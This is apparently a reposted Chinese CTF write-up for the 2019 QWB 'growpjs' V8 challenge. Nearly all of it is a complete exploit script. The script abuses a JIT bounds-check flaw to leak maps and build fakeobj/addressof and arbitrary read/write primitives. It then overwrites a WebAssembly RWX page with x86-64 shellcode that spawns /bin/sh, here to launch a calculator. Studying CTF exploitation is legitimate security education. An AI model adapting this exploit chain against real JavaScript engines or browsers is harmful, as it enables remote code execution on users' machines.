2019QWB growpjs
2023-12-20 23:40:31
第一次知道原来各种 map 也是分配在一段连续的内存空间中存储的,所以必要的时候可以通过固定偏移(仅对同一 V8 版本/构建有效,换了二进制就要重新测)从一种 map 的地址推出另一种 map 的地址。但是要注意,读取的时候必须保证相关对象不被 GC 释放。
这也是我做的第一道涉及优化器的题目,收获很多。
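/**
 * Reinterprets one 8-byte buffer as a double, as two uint32 words, or as
 * bytes, so raw 64-bit values can be moved in and out of double-typed
 * array slots.
 *
 * Limitation: 64-bit values travel as JS Numbers, so values above 2^53
 * whose low bits are significant are rounded. The script only relies on
 * words it reads back unchanged (maps, tagged pointers, small markers).
 */
class Memory{
  constructor(){
    this.buf = new ArrayBuffer(8);
    this.f64 = new Float64Array(this.buf);
    this.u32 = new Uint32Array(this.buf);
    this.bytes = new Uint8Array(this.buf);
  }
  // double ==> Uint64: the raw IEEE-754 bit pattern of `val` as a Number.
  d2u(val){
    this.f64[0] = val;
    const lo = this.u32[0];
    const hi = this.u32[1];
    return hi * 0x100000000 + lo;
  }
  // Uint64 ==> double: the double whose bit pattern is `val`.
  u2d(val){
    // Math.floor rather than radix-less parseInt on a Number: the original
    // went through a string round trip, which is slower and breaks once
    // the Number prints in exponent notation.
    const lo = Math.floor(val % 0x100000000);
    const hi = Math.floor((val - lo) / 0x100000000);
    this.u32[0] = lo;
    this.u32[1] = hi;
    return this.f64[0];
  }
}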
/**
 * Formats a number as 16 zero-padded lowercase hex digits (no 0x prefix).
 * Longer representations are returned unpadded.
 */
function hex(i) {
  const digits = i.toString(16);
  const padding = Math.max(0, 16 - digits.length);
  return `${"0".repeat(padding)}${digits}`;
}
// Script-wide helpers.
var mem = new Memory();  // double <-> uint64 reinterpretation scratchpad
var store = [];          // scratch array; nothing later in the script appears to use it
// JIT target for the out-of-bounds read. The index comes from a property
// load (map_tmp.x = 3) on a 3-element double array; the challenge's
// patched optimizer presumably drops the bounds check, so once this is
// optimized, map_obj[3] reads the slot just past the elements. The value
// read there is used below as the map of a double-elements array.
// map_obj and map_tmp are returned so they stay alive until the caller is
// done with them. Keep the body shape as-is: it is what the optimizer sees.
function readmap_()
{
var map_obj=[1.1,2.2,3.3];
var map_tmp={x:3};
return [map_obj[map_tmp.x],map_obj,map_tmp];
}
// Runs readmap_ 12000 times so it gets optimized, then returns the leaked
// OOB value from one more (now optimized) call.
function readmap()
{
  let warmup = 12000;
  while (warmup-- > 0) {
    readmap_();
  }
  const [leaked] = readmap_();
  return leaked;
}
// Leak the map of a double-elements array via the OOB read, then derive the
// map of an object-elements array by a fixed delta. 0xa0 is specific to the
// challenge's V8 build and must be re-measured for any other binary.
var float_map = mem.d2u(readmap());
var obj_map = float_map + 0xa0;
console.log(`[*] float_map is 0x${hex(float_map)}`);
console.log(`[*] obj_map is 0x${hex(obj_map)}`);
// Both maps encoded as doubles so they can be stored in double-array slots.
var float_mapp = mem.u2d(float_map);
var obj_mapp = mem.u2d(obj_map);
// JIT target for the "fake object" primitive. Builds a double array holding
// `address` three times, then stores obj_mapp (the object-array map, as a
// double) at index 3 -- the OOB slot that presumably holds the array's map.
// After the swap the engine treats the stored doubles as tagged pointers,
// so arr_1[0] reads back as whatever object lives at `address`.
// Keep the body shape as-is: it is what the optimizer sees.
function fakeobj_(address)
{
var arr_1=[address,address,address];
var tmp_1={x:3};
arr_1[tmp_1.x]=obj_mapp;
return arr_1;
}
// Warms fakeobj_ until it is optimized and returns, from the final
// iteration, the object that `address` (a double) was reinterpreted as.
function fakeobj(address)
{
  let forged;
  for (let round = 0; round < 12000; round++) {
    forged = fakeobj_(address);
  }
  return forged[0];
}
// A real JS reference to the double-array map (the object at float_map).
// Storing it into an array's map slot below retypes that array to doubles.
var float_obj=fakeobj(float_mapp);
// JIT target for the "address of" primitive: the inverse of fakeobj_.
// Builds an object array holding `object` three times, then writes the
// double-array map into the OOB map slot, so arr_2[0] reads back the
// object's tagged pointer as a double. Keep the body shape as-is.
function addressof_(object)
{
var arr_2=[object,object,object];
var tmp_2={x:3};
arr_2[tmp_2.x]=float_obj;
return arr_2;
}
// Warms addressof_ until it is optimized and returns, from the final
// iteration, the double that aliases `object`'s tagged pointer.
function addressof(object)
{
  let leaked;
  for (let round = 0; round < 12000; round++) {
    leaked = addressof_(object);
  }
  return leaked[0];
}
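// Objects whose layout is probed below. The ArrayBuffer's byte length
// (0x1234) and obj's inline property value (0x5678) act as markers so the
// scan can find them without hard-coding per-build offsets.
var objt = { 'a': 1 };
var arbf = new ArrayBuffer(0x1234);
var obj = { 'a': mem.u2d(0x5678) };
// Template for a fake JSArray header stored as doubles. slice(0) forces a
// fresh copy so the literal's backing store is not shared. 0x100000000000
// in the length slot is what lets `victim` index far past any real array.
// The slot layout is build-specific.
var fakeArray = [
  float_mapp,
  mem.u2d(0),
  mem.u2d(0),
  mem.u2d(0x100000000000),
  1.1,
  2.2
].slice(0);
var fakeArrayaddr = mem.d2u(addressof(fakeArray));
// Presumably the elements field: point it at fakeArray itself.
fakeArray[2] = mem.u2d(fakeArrayaddr);
// fakeArrayaddr+0x190 is presumably where the fake header starts in this
// build (inside fakeArray's own double elements).
var victim = fakeobj(mem.u2d(fakeArrayaddr + 0x190));
console.log(`[*] fakeArrayaddr is ${hex(fakeArrayaddr)}`);
// Scan forward through memory via the oversized array for the two markers.
// This reads up to 0x300 slots past victim's real data, so it can fault if
// the heap layout differs. The last match wins, as in the original scan.
var buf_idx = -1;
var obj_idx = -1;
var max_idx = 0x300;
for (let i = 0; i < max_idx; i++) {
  const t = mem.d2u(victim[i]);
  if (t === 0x1234) buf_idx = i + 1;  // backing-store pointer follows byte_length
  if (t === 0x5678) obj_idx = i;      // obj.a's inline slot
}
// Fail loudly: with an index left at its default the primitives below would
// read and write victim[0] and silently corrupt the heap instead of raising.
if (buf_idx < 0 || obj_idx < 0) {
  throw new Error(`heap scan failed: buf_idx=${buf_idx} obj_idx=${obj_idx}`);
}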
// Memory primitives on top of the corrupted `victim` array:
//   addressof(): park the object in obj.a and read its tagged pointer back
//                through victim[obj_idx];
//   read64():    overwrite arbf's backing-store pointer via victim[buf_idx]
//                and read 8 bytes through a DataView.
class ArbitraryRW
{
  // Returns `newobj`'s tagged pointer as a Number (callers strip the tag
  // themselves, see the -1 on the read64 call below).
  addressof(newobj)
  {
    obj.a = newobj;
    const slot = victim[obj_idx];
    return mem.d2u(slot);
  }
  // Returns the 8 little-endian bytes at `address` as a Number.
  read64(address)
  {
    victim[buf_idx] = mem.u2d(address);
    // A fresh DataView each call on purpose: presumably the view captures
    // the backing-store pointer at construction, so a cached view would
    // keep reading the old address -- TODO confirm for this build.
    const view = new DataView(arbf);
    const raw = view.getFloat64(0, true);
    return mem.d2u(raw);
  }
}
// Instantiate the primitives and sanity-print what the scan found.
var arw = new ArbitraryRW();
var objarray = [objt, objt];  // nothing below appears to use this
var objaddr = arw.addressof(objt);
console.log(`[*] objaddr is 0x${hex(objaddr)}`);
console.log(`[*] buf_idx is 0x${hex(buf_idx)}`);
console.log(`[*] obj_idx is 0x${hex(obj_idx)}`);
// Minimal wasm module: exports `memory` and a function `main` whose body is
// `i32.const 42; end` (bytes 65,42,11). Instantiating it gives the process a
// JIT region that is both writable and executable in this build.
var wasmCode = new Uint8Array([0,97,115,109,1,0,0,0,1,133,128,128,128,0,1,96,0,1,127,3,130,128,128,128,0,1,0,4,132,128,128,128,0,1,112,0,0,5,131,128,128,128,0,1,0,1,6,129,128,128,128,0,0,7,145,128,128,128,0,2,6,109,101,109,111,114,121,2,0,4,109,97,105,110,0,0,10,138,128,128,128,0,1,132,128,128,128,0,0,65,42,11]);
var wasmModule = new WebAssembly.Module(wasmCode);
var wasmInstance = new WebAssembly.Instance(wasmModule, {});
let wasmFunc = wasmInstance.exports.main;
var inst_addr=arw.addressof(wasmInstance);
// +0x88 is presumably the offset of the pointer to the instance's JIT code
// in this build's WasmInstanceObject; -1 strips the HeapObject tag from the
// address returned by addressof. Both need re-measuring on another build.
var rwx_addr=arw.read64(inst_addr+0x88-1);
console.log("[*] inst_addr is 0x"+hex(inst_addr));
console.log("[*] rwx_addr is 0x"+hex(rwx_addr));
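// x86-64 Linux payload: execve("/bin/sh", ["/bin/sh", "-c",
// "DISPLAY=:0 gnome-calculator"], NULL) -- the usual pop-a-calc proof.
const shellcode = new Uint8Array([0x6a,0x3b,0x58,0x99,0x48,0xbb,0x2f,0x62,0x69,0x6e,0x2f,0x73,0x68,0x00,0x53,0x48,0x89,0xe7,0x68,0x2d,0x63,0x00,0x00,0x48,0x89,0xe6,0x52,0xe8,0x1c,0x00,0x00,0x00,0x44,0x49,0x53,0x50,0x4c,0x41,0x59,0x3d,0x3a,0x30,0x20,0x67,0x6e,0x6f,0x6d,0x65,0x2d,0x63,0x61,0x6c,0x63,0x75,0x6c,0x61,0x74,0x6f,0x72,0x00,0x56,0x57,0x48,0x89,0xe6,0x0f,0x05]);
// arbf is the write window; refuse to overrun it rather than let the
// DataView throw halfway through a partially written payload.
if (shellcode.length > arbf.byteLength) {
  throw new Error(`payload (${shellcode.length} bytes) exceeds write window (${arbf.byteLength} bytes)`);
}
// Redirect arbf's backing store to the RWX region and copy the payload in.
victim[buf_idx] = mem.u2d(rwx_addr);
// Fresh DataView on purpose (same reason as in read64): it must pick up the
// pointer just written, not one captured earlier.
const dt = new DataView(arbf);
for (let i = 0; i < shellcode.length; i++) {
  // setUint8 takes no endianness argument; the original passed a spurious one.
  dt.setUint8(i, shellcode[i]);
}
// The export's code lives in the region just overwritten, so this runs it.
wasmFunc();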
文章来源:https://blog.csdn.net/weixin_46483787/article/details/135103924